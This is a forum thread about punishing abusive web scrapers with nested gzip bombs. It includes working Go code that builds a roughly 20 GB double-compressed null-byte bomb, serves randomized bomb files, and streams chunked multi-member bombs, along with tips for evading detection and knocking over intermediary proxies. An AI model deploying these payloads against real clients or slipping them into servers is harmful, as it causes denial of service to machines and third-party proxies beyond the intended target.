
Interesting. What does number 5 do?

Also, how do gzip bombs work? Does it automatically extract to the 20 GB, or does the bot have to initiate the extraction?



> Interesting. What does number 5 do?

LLMs that are used to offer web-scraping capabilities like this usually try to replace the scraper's interaction with the website in a programmable manner. There's a bunch of different prompt wordings, of course, depending on the service. But the idea is that you, as the server being scraped to death, get to learn which keywords people are scraping your website for. That way you at least learn something about why you are being scraped, and can adapt your website's structure and sitemap accordingly.

> how do gzip bombs work? Does it automatically extract to the 20 GB, or does the bot have to initiate the extraction?

The point behind it is that it's unlikely that script kiddies wrote their own HTTP parser that detects gzip bombs; they're reusing a tech stack or library that's made for the task at hand, e.g. Python's BeautifulSoup to parse content, Go's net/http, or PHP's curl bindings.

A nested gzip bomb targets both the client and the proxy in between. The proxy (targeted via Transfer-Encoding) has to unpack around ~2 GB into memory before it can process the response and serve the content to its client. The client (targeted via Content-Encoding) has to unpack ~20 GB of gzip into memory before it can process the content, only to realize that it's basically just null bytes.
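
For illustration, here's a minimal sketch (in Go, with a made-up file name and sizes) of how such a nested bomb can be produced: null bytes are streamed through two stacked gzip writers, so the inner stream becomes the Content-Encoding layer and the outer one the Transfer-Encoding layer:

    package main

    import (
        "compress/gzip"
        "os"
    )

    func main() {
        // Outer layer: what the proxy has to unpack (Transfer-Encoding: gzip).
        out, err := os.Create("bomb.gz.gz") // illustrative file name
        if err != nil {
            panic(err)
        }
        defer out.Close()

        outer, _ := gzip.NewWriterLevel(out, gzip.BestCompression)
        // Inner layer: what the client has to unpack (Content-Encoding: gzip).
        inner, _ := gzip.NewWriterLevel(outer, gzip.BestCompression)

        zeros := make([]byte, 1<<20)                     // 1 MiB of null bytes, written repeatedly
        for written := 0; written < 20*1024; written++ { // ~20 GiB in total
            if _, err := inner.Write(zeros); err != nil {
                panic(err)
            }
        }
        inner.Close() // flush the inner gzip stream into the outer one
        outer.Close() // flush the outer gzip stream to disk
    }

The resulting file can then sit on disk and be served as-is; the double compression is what keeps the on-wire size small.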

The idea is that a script kiddie's scraper script won't account for this, and in the process DDoS the proxy, which in return will block the client for violations of ToS of that web scraping / residential IP range provider.

The awesome part behind gzip is that the size of the final container / gzip bomb is varying, meaning that the null bytes length can just be increased by say, 10GB + 1 byte, for example, and make it undetectable again. In my case I have just 100 different ~100kB files laying around on the filesystem that I serve in a randomized manner and that I serve directly from filesystem cache to not need CPU time for the generation.
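
A sketch of the serving side under similar assumptions (directory, file names, route and port are all made up): pick one of the pre-generated files at random per request and hand it out with Content-Encoding: gzip, so the client library inflates it on its own:

    package main

    import (
        "math/rand"
        "net/http"
        "os"
        "path/filepath"
        "strconv"
    )

    func bombHandler(w http.ResponseWriter, r *http.Request) {
        // Pick one of the pre-generated files so the response size varies
        // and the bomb is harder to fingerprint.
        name := filepath.Join("bombs", "bomb-"+strconv.Itoa(rand.Intn(100))+".gz")

        data, err := os.ReadFile(name) // small (~100 kB), so reading it whole is fine
        if err != nil {
            http.Error(w, "not found", http.StatusNotFound)
            return
        }

        // Claim the body is gzip-compressed HTML; a well-behaved client
        // library will transparently inflate it.
        w.Header().Set("Content-Encoding", "gzip")
        w.Header().Set("Content-Type", "text/html")
        w.Write(data)
    }

    func main() {
        http.HandleFunc("/trap", bombHandler) // hypothetical trap route
        http.ListenAndServe(":8080", nil)
    }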

You can actually go further and use Transfer-Encoding: chunked in other languages that allow parallelization via processes, goroutines or threads, and have nested nested nested gzip bombs with various byte sizes so they're undetectable until concated together on the other side :)
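
A rough sketch of that chunked idea, simplified here to a single layer of standalone gzip members rather than nested ones (route, member count and sizes are invented): gzip allows concatenated members, so each flushed chunk looks harmless on its own and only adds up once the client inflates the whole body:

    package main

    import (
        "compress/gzip"
        "net/http"
    )

    func chunkedBomb(w http.ResponseWriter, r *http.Request) {
        w.Header().Set("Content-Encoding", "gzip")
        w.Header().Set("Content-Type", "text/html")
        // No Content-Length, so Go answers with Transfer-Encoding: chunked.

        flusher, _ := w.(http.Flusher)
        zeros := make([]byte, 1<<20) // 1 MiB of null bytes per write

        for member := 0; member < 64; member++ {
            zw := gzip.NewWriter(w)    // each member is a standalone gzip stream
            for i := 0; i < 256; i++ { // ~256 MiB of zeros per member
                zw.Write(zeros)
            }
            zw.Close()
            if flusher != nil {
                flusher.Flush() // push this member out as its own chunk(s)
            }
        }
    }

    func main() {
        http.HandleFunc("/trap-chunked", chunkedBomb) // hypothetical route
        http.ListenAndServe(":8080", nil)
    }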


Yes, it requires the client to try to extract the archive; https://en.wikipedia.org/wiki/Zip_bomb is the generic description.


What archive? The idea was to use Transfer-Encoding: gzip, which means the compression is a transparent part of the HTTP response, which the client's HTTP library will automatically try to extract.


Unless I misunderstood, there was a gzip-transfer-encoded gzip.

The transfer encoding means that the proxy has to decompress a ~200 kB response into ~2 GB for the client, and the client then receives a ~2 GB file that expands to ~20 GB.

Small VM gets knocked offline and the proxy gets grumpy with the client for large file transfers.


> Unless I misunderstood, there was a gzip-transfer-encoded gzip.

Yes, correct. A gzip bomb inside a gzip bomb, containing only null bytes, because that way it's much larger on the client side when unpacked.

A "normal" gzip bomb that would only leverage "Content-Encoding: gzip" or only "Transfer-Encoding: gzip" isn't really good as for compression ratio, because the sent file is in the megabytes range (I think it was around 4MBish when I tried with gzip -9?). I don't wanna send megabytes in response to clients, because that would be a potential DoS.

edit: also note the sibling comment here: https://news.ycombinator.com/item?id=41923635#41936586


I'm using "archive" as a generic term for gzip/zip/etc.

But that's a good point; I'd not considered that if you compress the HTTP response it'll almost certainly get automatically extracted, which "detonates" the (g)zip bomb.


Most HTTP libraries would happily extract the result for you. [citation needed]


Java class java.net.http.HttpClient

Python package requests

Whatever is the default these days in C#

Honestly, I have never used a modern HTTP client library that does not automatically decompress.

I guess libCurl might be a case where you need to add an option to force decompress.
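
Go's net/http (mentioned upthread) is a concrete example of that behaviour; a minimal sketch with a placeholder URL: the default transport asks for gzip itself and transparently inflates the body, so reading the response is the step that blows up:

    package main

    import (
        "fmt"
        "io"
        "net/http"
    )

    func main() {
        resp, err := http.Get("https://example.com/trap") // placeholder URL
        if err != nil {
            panic(err)
        }
        defer resp.Body.Close()

        // The transport already stripped Content-Encoding and wrapped the body
        // in a gzip reader, so ReadAll receives the uncompressed stream.
        body, err := io.ReadAll(resp.Body)
        if err != nil {
            panic(err)
        }
        fmt.Println("bytes after transparent decompression:", len(body))
        fmt.Println("was decompressed by the transport:", resp.Uncompressed)
    }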



